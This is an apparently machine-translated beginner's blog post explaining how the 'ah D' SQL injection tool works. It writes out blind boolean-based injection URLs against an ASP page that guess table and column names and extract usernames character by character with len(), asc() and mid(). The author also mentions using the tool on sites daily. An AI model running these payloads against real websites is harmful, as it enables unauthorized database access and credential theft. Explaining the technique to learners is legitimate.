Cainiao also came to learn penetration-ah d injection tool to guess the principle

Such a strange name is a bit fresh in this article. Many cainiao like me don't know anything, so they know that the tool starts to crash. Go to the workshop after reading a tutorial. I don't understand anything. Let's analyze the principle of this tool today. In fact, this is the method of manual injection. http://localhost/article.asp?id=124 This is an injection point. We need it to guess the table name. How to submit? http://localhost/article.asp?id=124 And exists (select count (*) from admin) and then the page returns. If the returned result is normal, the table exists. Otherwise, the table does not exist. The ah d tool is like this. Its software database contains many table names that have been added in advance. Then, I tried it one by one. Of course, the figure shows that many fields are also set. I tried it out one by one. With the table name, the next step is to guess the field. You need to use the following statement: http://localhost/article.asp?id=124 And exists (select username from admin) is to replace count (*) with the field name. Match the fields in the configuration list one by one. If the page returns normal, the field exists. The field is ready, and the next step is to guess the value. URL + suffix http://localhost/article.asp?id=124 And (select top 1 len (username) from admin)> 0 http://localhost/article.asp?id=124 And (select top 1 len (username) from admin)> 5 http://localhost/article.asp?id=124 And (select top 1 len (username) from admin)> 6 until the length is determined accurately. The len () function is responsible for calculating the length of the first record in username until the length is reached. The next step is to accurately guess the value of each bit. And (select top 1 asc (mid (username, 1, 1) from admin)> 97 and (select top 1 asc (mid (username, 1, 1) from admin)> 98 and (select top 1 asc (mid (username, 1, 1) from admin)> 99 and (select top 1 asc (mid (username, 1, 1) from admin) = 100 parse the meaning of this statement. Is the use of some functions, asc () is responsible for querying the ascii code value of a character, mid (addr, start, len) this function selects the characters starting from start len in a string. This statement is the first character of the string. Of course, the second character: and (select top 1 asc (mid (username, 2, 1) from admin)> 99 is calculated in this way. After obtaining the result of each bit, the conversion character is the user name or password. This is why the table name and field are all output results one by one. The detection content on the right is a single character. Understand the principle. Can I write an injection tool by myself? I don't know what I used to know. It's a great sense of accomplishment to go to the station with ah d every day. Xi